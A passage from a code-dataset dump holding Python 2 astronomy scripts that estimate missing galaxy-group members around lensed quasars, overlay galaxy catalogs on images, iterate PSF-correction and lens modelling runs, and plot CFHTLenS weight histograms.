np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/PG1115/galotherredshift.cat', usecols=[0])\n groupgals = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/PG1115/galgroup.cat')\n ra = 0\n dec = 1\n id = 2\n flux_rad = 3\n r = 4\nif lens == 'WFI2033':\n file = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n data = np.loadtxt(file,usecols=[2,3,4,8,28,29,30,40,97])\nif lens == '0408':\n file = \"/Users/cerusu/Dropbox/Davis_work/code/0408/DESJ0408_cat_filtered_120arcsec_225_includesspeczcol.tab\"\n data = np.loadtxt(file,usecols=[0,1,4,2,10,11,11,15,3])\n data[:,5] = data[:,4] - data[:,5]\n data[:,6] = data[:,4] + data[:,6]\nra = 0\ndec = 1\ni = 2\nid = 3\nz = 4\nzinf = 5\nzsup = 6\nspec = 7\ncls = 8\n\ncoord = SkyCoord(ra=data[:,ra]*u.degree, dec=data[:,dec]*u.degree, frame='fk5')\nsep = coord.separation(center_lens).arcsec\nif lens == 'WFI2033' or lens == '0408': all = len(data[:,id][(sep <= 120) & (data[:,i] <= limmag) & (data[:,cls] >= 0)])\nif lens == 'PG1115': all = len(data[:,id][(sep <= 120) & (data[:,r] <= limmag) & (data[:,flux_rad] >= 1.25)])\nprint \"gals: \",all\nif lens == 'WFI2033' or lens == '0408': specs120 = len(data[:,id][(sep <= 120) & (data[:,i] <= limmag) & (data[:,spec] > 0)])\nif lens == 'PG1115':\n observed120_membersID = groupgals[:,0]\n specs120 = len(observed120_membersID) + 1 + np.shape(othergals)[0] # adding the lens to the counts\nprint \"specs inside 120\\\": \",specs120\nif lens == 'WFI2033': observed120_membersID = data[:,id][(data[:,spec] <= zgroup + 0.01) & (data[:,spec] >= zgroup - 0.01) & (sep <= 120) & (data[:,i] <= limmag) & (data[:,cls] >= 0)]\nif lens == '0408': observed120_membersID = data[:,id][(data[:,spec] <= zgroup + 0.01) & (data[:,spec] >= zgroup - 0.01) & (sep <= 120) & (data[:,i] <= limmag) & (data[:,cls] >= 0)]\nif (lens == 'PG1115') or (zgroup == 0.6588): print 'members inside 120\\\":',len(observed120_membersID) + 1\nelse: print 'members inside 120\\\":',len(observed120_membersID)\nif lens == 'WFI2033' or lens == '0408': pool = data[:,id][(data[:,spec] == -1) & (sep <= 120) & (data[:,cls] >= 0) & (data[:,z] - photoztolerance * (data[:,z] - data[:,zinf]) <= zgroup) & (data[:,z] + photoztolerance * (data[:,zsup] - data[:,z]) >= zgroup) & (data[:,i] <= faintmagspec)]\nif lens == 'PG1115':\n pool = data[:,id][(sep <= 120) & (data[:,r] <= limmag) & (data[:,flux_rad] >= 1.25)]\n for i in range(len(othergals)):\n pool = np.delete(pool,np.where(pool == othergals[i]))\n for i in range(np.shape(groupgals)[0]):\n pool = np.delete(pool,np.where(pool == groupgals[:,0][i]))\nprint 'size of pool: ',len(pool)\n#veldisp0.598 (0408) = 224+58-47 (rest-frame) -> Fig 5 Andreon 2010 far outside the plot, only ~1 member expected\n#veldisp0.66 = 502+/-83 -> Fig 5 Andreon 2010 [median range: 10-(20)-32; 68% range around central '()' median 13-30, in quadrature 20-12+16] galaxies inside R_200\n#veldisp0.49 = 518+/-99 -> Fig 5 Andreon 2010 [median range: 10-(20)-39; 68% range around central '()' median 13-30, in quadrature 20-12+21] galaxies inside R_200\n#veldisp0.31 = 390+50-60 -> Fig 5 Andreon 2010 [median range: 5-(8)-12; 68% range around central '()' median 6-12, in quadrature 8-4+6] galaxies inside R_200\n#veldisp0.31 = 440+90-80 -> Fig 5 Andreon 2010 [median range: 6-(13)-20; 68% range around central '()' median 8-18, in quadrature 13+/-8.5] galaxies inside R_200\nif lens == '0408' and zgroup == 0.598: med = 1; stdinf = 0; stdsup = 2\nif zgroup == 0.6588: med = 20; stdinf = 12; stdsup = 16\nif zgroup == 0.4956: med = 20; stdinf = 12; stdsup = 21\nif zgroup == 0.3097: med = 8; stdinf = 4; stdsup = 6 # Wilson\n#if zgroup == 0.3097: med = 13; stdinf = 8.5; stdsup = 8.5 # Momcheva\n\nif mode == \"mcmc\":\n def expected_members():\n while True:\n # sample uniformly a cube of size 2 x unit radius\n x = np.random.uniform(-1,1,10000)\n y = np.random.uniform(-1,1,10000)\n z = np.random.uniform(-1,1,10000)\n sep_group = np.sqrt(np.random.normal(sep_groupx, err_group, 1)**2 + np.random.normal(sep_groupy, err_group, 1)**2)\n virrad_sample = np.max([10,sep_group,np.abs(np.random.normal(virrad, virrad_err, 1))]) # using lower limit to avoid numerical problems\n cx = 1.0 * sep_group / virrad_sample\n cy = 0\n rad = 120.0 / virrad_sample\n # fraction of volume of the virial sphere which contains the 120\"-radius cylinder centered on the lens\n frac = 1.0*len(x[(x**2 + y**2 + z**2 <= 1) & ((x-cx)**2 + (y-cy)**2 <=rad**2)]) / len(x[x**2 + y**2 + z**2 <= 1])\n nr = 0\n while True:\n nr += 1\n rand = np.random.uniform(0,1,1)[0]\n if rand <= 0.5: x = int(round(med - np.abs(np.random.normal(med, stdinf, 1) - med))) # based on the velocity dispersion - concentration relation above\n else: x = int(round(med + np.abs(np.random.normal(med, stdsup, 1) - med)))\n #print x,frac * x, observed_members, len(observed120_membersID)\n if (lens == 'PG1115') or (zgroup == 0.6588):\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID) + 1)) or (nr == 100): break\n else:\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID))) or (nr == 100): break\n if (lens == 'PG1115') or (zgroup == 0.6588):\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID) + 1)): break\n else:\n if ((x >= observed_members) and (frac * x >= len(observed120_membersID))): break\n return x,frac\nif mode == \"mcmc\":\n def expected_members_noprior():\n # sample uniformly a cube of size 2 x unit radius\n x = np.random.uniform(-1,1,10000)\n y = np.random.uniform(-1,1,10000)\n z = np.random.uniform(-1,1,10000)\n sep_group = np.sqrt(np.random.normal(sep_groupx, err_group, 1)**2 + np.random.normal(sep_groupy, err_group, 1)**2)\n virrad_sample = np.max([10,sep_group,np.abs(np.random.normal(virrad, virrad_err, 1))]) # using lower limit to avoid numerical problems\n cx = 1.0 * sep_group / virrad_sample\n cy = 0\n rad = 120.0 / virrad_sample\n # fraction of volume of the virial sphere which contains the 120\"-radius cylinder centered on the lens\n fracnoprior = 1.0*len(x[(x**2 + y**2 + z**2 <= 1) & ((x-cx)**2 + (y-cy)**2 <=rad**2)]) / len(x[x**2 + y**2 + z**2 <= 1])\n while True:\n rand = np.random.uniform(0,1,1)[0]\n if rand <= 0.5: x = int(round(med - np.abs(np.random.normal(med, stdinf, 1) - med))) # based on the velocity dispersion - concentration relation above\n else: x = int(round(med + np.abs(np.random.normal(med, stdsup, 1) - med)))\n break\n return x,fracnoprior\nif mode == \"poisson\":\n def expected_members():\n while True:\n #x = np.random.poisson(1.0 * all * len(observed120_membersID)/specs120, 1)\n if (lens == 'PG1115') or (zgroup == 0.6588):\n x = np.random.poisson(1.0 * all * (len(observed120_membersID) + 1)/specs120, 1) # adding the lens to the counts\n if x >= len(observed120_membersID)+1: break\n else:\n x = np.random.poisson(1.0 * all * (len(observed120_membersID))/specs120, 1)\n if x >= len(observed120_membersID): break\n return x\nif mode == \"poisson\":\n def expected_members_noprior():\n while True:\n #x = np.random.poisson(1.0 * all * len(observed120_membersID)/specs, 1)\n if (lens == 'PG1115') or (zgroup == 0.6588): x = np.random.poisson(1.0 * all * (len(observed120_membersID) + 1)/specs120, 1)\n else: x = np.random.poisson(1.0 * all * len(observed120_membersID)/specs120, 1)\n break\n return x\n\npdz = np.array([])\ntheorysamples = 50000\nfor i in range(theorysamples):\n if i % 100 == 0: print i,'/',theorysamples\n #print i\n expected = expected_members()\n if mode == \"mcmc\": pdz = np.append(pdz,int(round(expected[1] * expected[0])))\n if mode == \"poisson\": pdz = np.append(pdz,expected[0])\npdznoprior = np.array([])\nfor i in range(theorysamples):\n if i % 100 == 0: print i,'/',theorysamples\n #print i\n expected = expected_members_noprior()\n if mode == \"mcmc\": pdznoprior = np.append(pdznoprior,int(round(expected[1] * expected[0])))\n if mode == \"poisson\": pdznoprior = np.append(pdznoprior,expected[0])\n\nif selectpdz == True:\n pdzselect = np.array([])\n for i in range(samples):\n expected = expected_members()\n if mode == \"mcmc\":\n if (lens == 'PG1115') or (zgroup == 0.6588): missing120_membersID = np.random.choice(a=pool, size=int(round(expected[1] * expected[0] - len(observed120_membersID) - 1)), replace=False)\n else: missing120_membersID = np.random.choice(a=pool, size=int(round(expected[1] * expected[0] - len(observed120_membersID))), replace=False)\n if mode == \"poisson\":\n if (lens == 'PG1115') or (zgroup == 0.6588): missing120_membersID = np.random.choice(a=pool, size=int(round(expected[0] - len(observed120_membersID) - 1)), replace=False)\n else: missing120_membersID = np.random.choice(a=pool, size=int(round(expected[0] - len(observed120_membersID))), replace=False)\n missing120_membersra = np.array([])\n missing120_membersdec = np.array([])\n #pdzselect = np.append(pdzselect,len(missing120_membersID)+len(observed120_membersID))\n if (lens == 'PG1115') or (zgroup == 0.6588): pdzselect = np.append(pdzselect,len(missing120_membersID)+len(observed120_membersID) + 1)\n else: pdzselect = np.append(pdzselect,len(missing120_membersID)+len(observed120_membersID))\n for j in range(len(missing120_membersID)):\n missing120_membersra = np.append(missing120_membersra,data[:,ra][data[:,id]==missing120_membersID[j]][0])\n missing120_membersdec = np.append(missing120_membersdec,data[:,dec][data[:,id]==missing120_membersID[j]][0])\n for k in range(len(observed120_membersID)):\n # removing also the known group members\n missing120_membersra = np.append(missing120_membersra,data[:,ra][data[:,id]==observed120_membersID[k]][0])\n missing120_membersdec = np.append(missing120_membersdec,data[:,dec][data[:,id]==observed120_membersID[k]][0])\n if lens == '0408': np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/0408/removelensgrouphandpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n #if zgroup == 0.6588: np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/removelensgrouphandpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n #if zgroup == 0.4956: np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/removelensgroup049handpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n #if zgroup == 0.3097: np.savetxt(\"/Users/cerusu/Dropbox/Davis_work/code/PG1115/removelensgroup\"+mode+\"handpicked\"+str(i)+\".cat\",np.c_[missing120_membersra,missing120_membersdec],fmt='%.8f %.9f')\n\nimport pylab as plt\nplt.clf()\nif (lens == 'PG1115') or (zgroup == 0.6588):\n plt.hist(pdz - len(observed120_membersID) - 1,bins=50,normed=True,label='w/ observed number prior')\n plt.hist(pdznoprior - len(observed120_membersID) - 1,bins=50,normed=True,label='w/o observed number prior',alpha = 0.5)\n if selectpdz == True: plt.hist(pdzselect - len(observed120_membersID) - 1,bins=50,normed=True,alpha = 0.5)\nelse:\n plt.hist(pdz - len(observed120_membersID),bins=50,normed=True,label='w/ observed number prior')\n plt.hist(pdznoprior - len(observed120_membersID),bins=50,normed=True,label='w/o observed number prior',alpha = 0.5)\n if selectpdz == True: plt.hist(pdzselect - len(observed120_membersID),bins=50,normed=True,alpha = 0.5)\nplt.xlabel(r'Expected number of missing members', fontsize=20)\nplt.ylabel(r'normalized counts', fontsize=20)\nplt.legend(loc=\"upper left\")\nplt.show()\nif (lens == 'PG1115') or (zgroup == 0.6588): print np.percentile(pdz - len(observed120_membersID) - 1,[16,50,84]) # I ran the code several times untill the two distributions match fairly well\nelse: print np.percentile(pdz - len(observed120_membersID),[16,50,84])\n\n# comment out the following lines. In case I want to produce a paper plot, I need to run the following lines in iPython so I can run for mcmc and poisson in turn.\n# first run with poisson\n#pdz_poisson_lens = pdz\n#pdznoprior_poisson_lens = pdznoprior\n#len_lens = len(observed120_membersID)\n# next run with mcmc\n#pdz_mcmc_los = pdz\n#pdznoprior_mcmc_los = pdznoprior\n#len_los = len(observed120_membersID)\n#plt.clf()\n#bin = 50\n#if (lens == 'PG1115'):\n# plt.hist(pdz_mcmc - len(observed120_membersID) - 1,bins=bin,normed=True,label='Volume-based; w/ observed number prior',color='r')\n# plt.hist(pdznoprior_mcmc - len(observed120_membersID) - 1,bins=bin,normed=True,label='Volume-based; w/o observed number prior',alpha = 0.5,color='r')\n# plt.hist(pdznoprior_poisson - len(observed120_membersID) - 1,bins=bin,normed=True,label='Poisson-based; w/o observed number prior',alpha = 0.5,color='k')\n#else:\n# plt.hist(pdz_mcmc - len(observed120_membersID),bins=bin,normed=True,label='Volume-based; w/ observed number prior',color='r')\n# plt.hist(pdznoprior_mcmc - len(observed120_membersID),bins=bin,normed=True,label='Volume-based; w/o observed number prior',alpha = 0.5,color='r')\n# plt.hist(pdznoprior_poisson - len(observed120_membersID),bins=bin,normed=True,label='Poisson-based; w/o observed number prior',alpha = 0.5,color='k')\n#plt.xlabel(r'Expected number of missing group members', fontsize=16)\n#plt.ylabel(r'normalized counts', fontsize=16)\n#plt.legend(loc=\"upper left\")\n#plt.title(r'PG1115+080', fontsize=20)\n#if (lens == 'PG1115'): print np.percentile(pdz - len(observed120_membersID) - 1,[16,50,84]) # I ran the code several times untill the two distributions match fairly well\n#else: print np.percentile(pdz - len(observed120_membersID),[16,50,84])\n#plt.savefig('/Users/cerusu/Dropbox/Davis_work/code/PG1115/estimatinggroupmembersPG1115.png', dpi=250, bbox_inches='tight')\n\n#plt.clf()\n#bin = 100\n#plt.hist(pdz_mcmc_lens - len_lens - 1,bins=bin,normed=True,label='z=0.66 Volume-based; w/ observed number prior',color='k',linestyle='--',histtype='step')\n#plt.hist(pdznoprior_mcmc_lens - len_lens - 1,bins=bin,normed=True,label='z=0.66 Volume-based; w/o observed number prior',color='k',linestyle=':',histtype='step')\n#plt.hist(pdznoprior_poisson_lens - len_lens - 1,bins=bin,normed=True,label='z=0.66 Poisson-based',color='k',linestyle='-',histtype='step')\n#plt.hist(pdz_mcmc_los - len_los,bins=bin,normed=True,label='z=0.49 Volume-based; w/ observed number prior',color='r',linestyle='--',histtype='step')\n#plt.hist(pdznoprior_mcmc_los - len_los,bins=bin,normed=True,label='z=0.49 Volume-based; w/o observed number prior',color='r',linestyle=':',histtype='step')\n#plt.hist(pdznoprior_poisson_los - len_los,bins=bin,normed=True,label='z=0.49 Poisson-based',color='r',linestyle='-',histtype='step')\n#plt.xlabel(r'Expected number of missing group members', fontsize=16)\n#plt.ylabel(r'normalized counts', fontsize=16)\n#plt.legend(loc=\"upper left\")\n#plt.xlim([-20,30])\n#plt.savefig('/Users/cerusu/Dropbox/Davis_work/code/WFI2033/estimatingmissinggroupmembersWFI2033.png', dpi=250, bbox_inches='tight')\n" }, { "alpha_fraction": 0.647606372833252, "alphanum_fraction": 0.7207446694374084, "avg_line_length": 34.761905670166016, "blob_id": "1d2c0b0a4e399af7fe21d029926b14aa9ca61711", "content_id": "ad85b6f1ed6ae5c9ddc31a93c53512497ba9aba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 752, "license_type": "no_license", "max_line_length": 94, "num_lines": 21, "path": "/python/plot_utilities/plot_imageoverlay.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Plots on top of a png image\n\nimport matplotlib.image as mpimg\nfrom astropy.io import fits\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pyplot as plt\nimport numpy as np\nplt.clf()\n#plt.axes().set_aspect('equal')\nimg=mpimg.imread('J1206gri.png')\nplt.imshow(img)\n#circle1 = plt.Circle((1/2.0,1/2.0),1/2.0,color='k',fill=False)\ncircle1 = plt.Circle((738,736.6),736,color='k',fill=False)\ngal=np.loadtxt(\"J1206_i23_120gal.cat\",usecols=[0,1],unpack=True)\nplt.scatter(1.005*gal[0],0.99*(1488-gal[1]),marker='s',facecolors='none', edgecolors='r',s=30)\nfig = plt.gcf()\nfig.gca().add_artist(circle1)\nfig = plt.gca()\nfig.axes.get_xaxis().set_visible(False)\nfig.axes.get_yaxis().set_visible(False)\nplt.savefig('test.png', dpi=300, bbox_inches='tight')\n\n" }, { "alpha_fraction": 0.5811688303947449, "alphanum_fraction": 0.6228355169296265, "avg_line_length": 36.71428680419922, "blob_id": "3bf9724151283e263538e3a5c56ebb41e19e36e7", "content_id": "8892ee98126245cfe7b898330e050f1ad6147090", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1848, "license_type": "no_license", "max_line_length": 214, "num_lines": 49, "path": "/python/modeling_utilities/iterateChihFan_2psf.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# I first edit gconfig to contain the correct input names. After that I modify g_nolens_out_file.input to use gpsfcorrect.fits as psf, disalow analytical PSF parameters (except for sky) and run the code as follows:\n# run as python iterateChihFan.py i_lens_out_file.input config psfcorrect.fits\n\nimport sys\nimport os\nimport numpy as np\nfrom astropy.io import fits\n\niterations = 3\npixscale = 0.256\n\nfor i in range(iterations):\n with open(sys.argv[1], 'r') as fileinput:\n hostlens = fileinput.readlines()\n\n x1 = float(hostlens[54-1].split()[1]) # faint\n y1 = float(hostlens[55-1].split()[1])\n f1 = float(hostlens[61-1].split()[1])\n x2 = float(hostlens[43-1].split()[1]) # bright\n y2 = float(hostlens[44-1].split()[1])\n f2 = float(hostlens[50-1].split()[1])\n\n image = fits.open(str(sys.argv[1])[:-10]+\"psf.fits\")\n data = image[0].data * f2\n imagex = image\n imagex[0].data = data\n imagex.writeto(str(sys.argv[3]),clobber=True)\n\n with open(sys.argv[2], 'r') as fileconfig:\n config = fileconfig.readlines()\n\n config[6] = \"x1_in_arcsec \" + \"%.6f\" % (x1 * pixscale) + \"\\n\"\n config[7] = \"y1_in_arcsec \" + \"%.6f\" % (y1 * pixscale) + \"\\n\"\n config[8] = \"x2_in_arcsec \" + \"%.6f\" % (x2 * pixscale) + \"\\n\"\n config[9] = \"y2_in_arcsec \" + \"%.6f\" % (y2 * pixscale) + \"\\n\"\n config[10] = \"intensityof1(weak) \" + \"%.6e\" % f1 + \"\\n\"\n config[11] = \"intensityof2(strong) \" + \"%.6e\" % f2 + \"\\n\"\n\n with open(sys.argv[2], 'w') as fileconfig:\n fileconfig.writelines(config)\n\n fileinput.close()\n fileconfig.close()\n\n os.system(\"python PSF_correction_2psf.py %s %s\" %(str(sys.argv[2]),str(sys.argv[3])))\n os.system(\"hostlens %s\" % str(sys.argv[1]))\n\nfor i in range(1):\n os.system(\"hostlens %s\" % str(sys.argv[1])) # because hostlens needs a few executions in order to fully converge\n" }, { "alpha_fraction": 0.5441909432411194, "alphanum_fraction": 0.649665892124176, "avg_line_length": 93.82527923583984, "blob_id": "74e6ed152df7d19ca1daa857b9679407c72b3128", "content_id": "b005da2f50d768b152fec2d277b2936190549bf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 111799, "license_type": "no_license", "max_line_length": 490, "num_lines": 1179, "path": "/python/weightinghistogramsuniversal.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# fields CFHTLenS W1-4\n# subfields: 171 1deg^2 throughout W1-4\n# cells: 4x4arcmin covering each subfield, in a grid\n# usage: use one of the following arguments: lens name, followed by orig or samp, followed by number of bins, followed by radius (45,60,90 or 120) and by maglimit\n\nimport numpy as np\nimport sys\nimport os\nfrom os import system\n#import scipy\n#from scipy import special\n#from astropy.io import fits\n#from astropy.wcs import WCS\n#from astropy import units as u\n#from astropy.coordinates import SkyCoord\n#from astropy.io import ascii\n#from astropy.table import Table, Column\nimport time\nimport matplotlib.pyplot as plt\n#from numpy.random import normal\nfrom scipy.stats.kde import gaussian_kde\nfrom numpy import linspace\n\nprint(\"Arguments: \\n Lens field: %s \\n Original values or samples drawn from P(z) and P(Mstar): %s \\n Number of bins: %s \\n Radius of each cell: %s \\n Limiting i-band magnitude: %s\" % (str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(sys.argv[4]), str(sys.argv[5])))\n\nif (str(sys.argv[2]) == \"samp\") or (str(sys.argv[2]) == \"tab\"):\n print \"This process is both processor and memory intensive and will take a couple of hours for a sampling of 1000...\"\n start_time = time.time()\n\nwith open('fieldsforhist50try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldsforhist75try_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5]))) as f:\n listfields = f.readlines()\n\nwith open('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W1\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W2\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W3\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\nwith open('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), 'w') as outfile:\n for i in range(len(listfields)):\n if \"W4\" in [x[0:len(listfields[0])-1] for x in listfields][i]:\n with open([x[0:len(listfields[0])-1] for x in listfields][i]) as infile:\n outfile.write(infile.read())\n\ncols=1\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.suptitle(r'HE0435 weight histogram test W1-W4', fontsize=10, y=0.998)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nx = linspace(0,2,500)\n\nplt.subplot(451)\nrangemax=4\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(451)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, 